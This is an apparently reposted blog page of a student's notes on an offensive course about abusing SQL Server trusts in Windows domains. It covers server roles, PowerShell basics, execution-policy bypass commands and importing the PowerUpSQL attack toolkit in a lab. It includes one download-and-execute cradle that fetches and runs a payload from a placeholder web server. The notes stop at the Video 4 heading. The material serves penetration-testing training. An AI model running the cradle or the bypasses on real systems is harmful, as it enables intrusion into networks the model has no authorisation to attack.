Abusing SQL Server Trusts in a Windows Domain (video notes) (in progress)
Video 1 - Introduction:
Course Content:
- Introduction to SQL server:
- SQL server roles and privileges
- introduction to PowerShell
- Discovery, Enumeration and Scanning
- Brute Force Attacks
- Privilege Escalation
- OS Command Execution
- Trust abuse and Lateral movement
- Persistence
- Identifying Juicy Information
- Defenses and Detection!
##############################
Video 2 - SQL Server:
- Integrates with domain by providing Windows authentication
- used by many enterprise applications
- most enterprise networks have sizable number of SQL server instances
Principals:
- Principals (read - account types) can be used to access resources from a SQL Server Instance.
- every Principal has a Security Identifier (SID)
- Scope of principals depends on the definition:
- Windows Users (Mapped to Logins)
- SQL Server Logins (Used to connect to an instance)
- Database Users (used to determine permissions within a database)
- Nine fixed server roles (permissions cannot be changed except for public) and user-defined server roles.
- Each member of a fixed server role can add other logins to that same role:
- sysadmin - God mode :)
- securityadmin - Path to God mode (Grant access and configure user permissions)
- public - Everyone (Connect and View any definition)
Look up SQL Server - Roles and Privileges!
https://ift.tt/2x1EJ2F
###############################
Video 3 - PowerShell:
- Provides access to almost everything in a Windows platform and Active Directory Environment which could be useful for an attacker.
- Provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes.
- Easy to Learn and really Powerful!
- Based on the .NET framework and is tightly integrated with Windows.
- PowerShell Core is platform independent.
PowerShell Help System:
Get-Help Get-Help
- Shows a brief help about the cmdlet or topic
- support wildcard
- comes with various options and filters
- Get-Help, Help and -? Could be used to display help!
- Get-Help About_<topic> could be used to get help for conceptual topics.
Example:
Get-Help Get-Help
Get-Help get-process
help get-process //lists everything which contains the word process
Get-Help * //lists everything about the help topics
Get-Help -Examples
Get-Help -Full
Get-Help Get-Item -Full //lists full help about a topic (Get-Item cmdlet in this case)
Get-Help Get-Item -Examples //lists examples of how to run a cmdlet (Get-Item cmdlet in this case)
Update-Help //update the help system(v3+)
help Get-Process -Full
Get-Alias -Definition help
- we can also try:
PS C:\Users\victim.LETHALLAB> help process
Name Category Module Synopsis
---- -------- ------ --------
Enter-PSHostProcess Cmdlet Microsoft.PowerShell.Core ...
Exit-PSHostProcess Cmdlet Microsoft.PowerShell.Core ...
Get-PSHostProcessInfo Cmdlet Microsoft.PowerShell.Core ...
Debug-Process Cmdlet Microsoft.PowerShell.M... ...
Get-Process Cmdlet Microsoft.PowerShell.M... ...
Start-Process Cmdlet Microsoft.PowerShell.M... ...
Stop-Process Cmdlet Microsoft.PowerShell.M... ...
Wait-Process Cmdlet Microsoft.PowerShell.M... ...
Cmdlets:
- are used to perform an action and a .NET object is returned as the output
- cmdlets accept parameters for different operations
- they have aliases
- these are NOT executables, you can write your own cmdlet with few lines of script!
PS C:\Users\victim.LETHALLAB> Get-Alias -Definition get-process
CommandType Name Version Source
----------- ---- ------- ------
Alias gps -> Get-Process
Alias ps -> Get-Process
- Use the below command for listing of all cmdlets:
Get-Command -CommandType cmdlet
- There are many interesting cmdlets from a pentester's perspective!
For example: 'Get-Process' lists processes running on a system!
PS C:\Users\victim.LETHALLAB> get-command -commandtype cmdlet |Measure-Object
Count : 489
Average :
Sum :
Maximum :
Minimum :
Property :
PowerShell Scripts:
- use cmdlets, native commands, functions, .Net, DLLs, Windows API and much more in a single 'program'
- PowerShell scripts are really powerful and could do much stuff in less lines.
- Easy syntax (mostly;) and easy to execute.
PowerShell Scripts:ISE
- it is a GUI Editor/Scripting Environment
- tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features.
- comes with a handy console pane to run commands from the ISE.
PowerShell Scripts: Execution Policy
- it is NOT a security measure, it is present to prevent users from accidentaly executing scripts
- Several ways to bypass:
Powershell -executionpolicy bypass .\script.ps1
powershell -c <cmd>
powershell -enc
PS C:\Users\victim.LETHALLAB\Downloads> .\Get-SQLInstance.ps1
.\Get-SQLInstance.ps1 : File C:\Users\victim.LETHALLAB\Downloads\Get-SQLInstance.ps1 cannot be loaded because running
scripts is disabled on this system.
PS C:\Users\victim.LETHALLAB> Get-ExecutionPolicy
Restricted
PS C:\Users\victim.LETHALLAB> powershell.exe -ExecutionPolicy bypass
Windows PowerShell
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\victim.LETHALLAB> cd .\Downloads\
PS C:\Users\victim.LETHALLAB\Downloads> ls
Directory: C:\Users\victim.LETHALLAB\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/2/2018 1:48 PM 12753 Get-SQLInstance.ps1
PS C:\Users\victim.LETHALLAB\Downloads> .\Get-SQLInstance.ps1
PowerShell Modules:
- powershell also supports modules
- a module can be imported with:
Import-Module <path to module>
- all the commands in a module can be listed with:
Get-Command -Module <moduleName>
PS C:\Users\victim.LETHALLAB\Downloads> import-module .\PowerUpSQL-master\PowerUpSQL.psd1
WARNING: The names of some imported commands from the module 'PowerUpSQL' include unapproved verbs that might make them
less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose
parameter. For a list of approved verbs, type Get-Verb.
PS C:\Users\victim.LETHALLAB\Downloads> import-module .\PowerUpSQL-master\PowerUpSQL.psd1 -Verbose
<abbreviated>
VERBOSE: Importing function 'Create-SQLFileXpDll'.
VERBOSE: Importing function 'Get-SQLAgentJob'.
VERBOSE: Importing function 'Get-SQLAssemblyFile'.
VERBOSE: Importing function 'Get-SQLAuditDatabaseSpec'.
VERBOSE: Importing function 'Get-SQLAuditServerSpec'.
VERBOSE: Importing function 'Get-SQLColumn'.
VERBOSE: Importing function 'Get-SQLColumnSampleData'.
<abbreviated>
PS C:\Users\victim.LETHALLAB\Downloads> get-command -module PowerUpSQL
CommandType Name Version Source
----------- ---- ------- ------
Function Create-SQLFileCLRDll 1.104.11 PowerUpSQL
Function Create-SQLFileXpDll 1.104.11 PowerUpSQL
Function Get-SQLAgentJob 1.104.11 PowerUpSQL
Function Get-SQLAssemblyFile 1.104.11 PowerUpSQL
Function Get-SQLAuditDatabaseSpec 1.104.11 PowerUpSQL
Function Get-SQLAuditServerSpec 1.104.11 PowerUpSQL
<abbreviated>
PS C:\Users\victim.LETHALLAB\Downloads>
Whenever there is a command execution opportunity, PowerShell scripts can be executed using the following methods:
-> Download execute cradle:
iex(New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
-> Encodedcommand
Check Out Invoke-CradleCrafter:
https://ift.tt/2vdU3Eq
SQLServer and PowerShell:
Powershell can be used to connect to SQL Server using any of the following methods:
- SQLPS module
- SQL Server Management Objects (SMO)
- .NET (System.Data.SQL and System.Data.SQLClient)
PowerUpSQL:
A PowerShell toolkit for attacking SQL servers:
https://ift.tt/2cJD2ZD
"The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on scale."
#################################
Video 4 - Discovering SQL Server within the Domain:
from BITCOIN NEWS https://ift.tt/2MTKzuv
via Bitcoin News Update
Thursday, September 6, 2018
Abusing SQL Server Trusts in a Windows Domain (video notes) (in progress)
Date - September 06, 2018
Bitcoin News
Share this
Related Articles :
Paling Dilihat
-
from BITCOIN NEWS http://bit.ly/2BAgGb6 via Bitcoin News Update
-
There’s only 10 days left until the Bitcoin Cash (BCH) network hard fork scheduled for Nov. 15. At the moment the upgrade has two competing...
-
Google hacking master list Dan Morrill (Program Director CityU of Seattle) posted 11/14/2008 | Comments (2) This master list of Google Ha...